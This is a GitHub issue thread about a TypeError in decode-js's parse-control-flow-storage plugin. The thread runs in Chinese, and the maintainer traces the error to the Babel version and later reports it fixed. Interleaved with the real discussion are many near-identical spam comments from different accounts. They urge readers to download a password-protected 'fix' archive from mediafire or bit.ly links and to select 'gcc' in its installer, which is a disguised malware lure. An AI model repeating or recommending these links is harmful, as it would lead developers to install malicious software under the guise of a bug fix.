### ISSUE TITLE
obfuscator: parse-control-flow-storage无法获取变量的binding

### ISSUE THREAD

**Issue by uminoai** [echo094/decode-js#116]
### Which plugin are you reporting a bug for?

obfuscator

### Version of Node

v20.15.1

### Input code

https://playcode.io/1981492

### Additional context

我用deob解密，然后报下面这个错误。
decode-js/src/visitor/parse-control-flow-storage.js:120   
for (let i = bind.length - 1; i >= 0; --i) {
TypeError: Cannot read properties of undefined (reading 'length')

然后我把这个for循环给注释掉后正常处理完了，代码也可以正常运行。大佬麻烦看下这个需不需要修复。

**Comment by echo094** [comment]
确切的问题是，遍历时在当前作用域找不到该变量的记录，这是个不应该出现的情况。

测试后发现在调用`merge-object`后，部分未被处理的变量也出现了这个问题。

在更新了babel插件版本后，该问题消失（在`7.25.0`到`7.25.2`之间被解决，推测与以下修改有关 babel/babel#16587）。

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by uminoai** [comment]
我更新了babel后，还是有这个错误，这是我的配置文件和依赖版本，麻烦看下。
`{
  "name": "decode-js",
  "scripts": {
    "decode": "node --no-node-snapshot src/main.js",
    "deob": "node --no-node-snapshot src/main.js -t obfuscator",
    "deso": "node --no-node-snapshot src/main.js -t sojson",
    "desov7": "node --no-node-snapshot src/main.js -t sojsonv7",
    "lint": "eslint --ext .js --fix src"
  },
  "dependencies": {
    "@babel/generator": "^7.25.0",
    "@babel/parser": "^7.25.0",
    "@babel/traverse": "^7.25.2",
    "@babel/types": "^7.25.0",
    "eslint": "^8.23.0",
    "eslint-config-prettier": "^8.5.0",
    "eslint-plugin-prettier": "^4.2.1",
    "isolated-vm": "^4.7.2",
    "node-gyp": "^10.2.0",
    "prettier": "^2.7.1"
  }
}`

├── @babel/generator@7.25.5
├── @babel/parser@7.25.4
├── @babel/traverse@7.25.4
├── @babel/types@7.25.4
├── eslint-config-prettier@8.5.0
├── eslint-plugin-prettier@4.2.1
├── eslint@8.23.1
├── isolated-vm@4.7.2
├── node-gyp@10.2.0
└── prettier@2.7.1

**Comment by uminoai** [comment]
> https://playcode.io/1981492



> 确切的问题是，遍历时在当前作用域找不到该变量的记录，这是个不应该出现的情况。
> 
> 测试后发现在调用`merge-object`后，部分未被处理的变量也出现了这个问题。
> 
> 在更新了babel插件版本后，该问题消失（在`7.25.0`到`7.25.2`之间被解决，推测与以下修改有关 [babel/babel#16587](https://github.com/babel/babel/pull/16587)）。

不好意思，确认了下，我第一次贴的代码确实可以了，但是有个新代码还是上面这个错误，麻烦大佬看下。
https://playcode.io/1984042

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by marcosj046** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by echo094** [comment]
> https://playcode.io/1984042

已修复

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
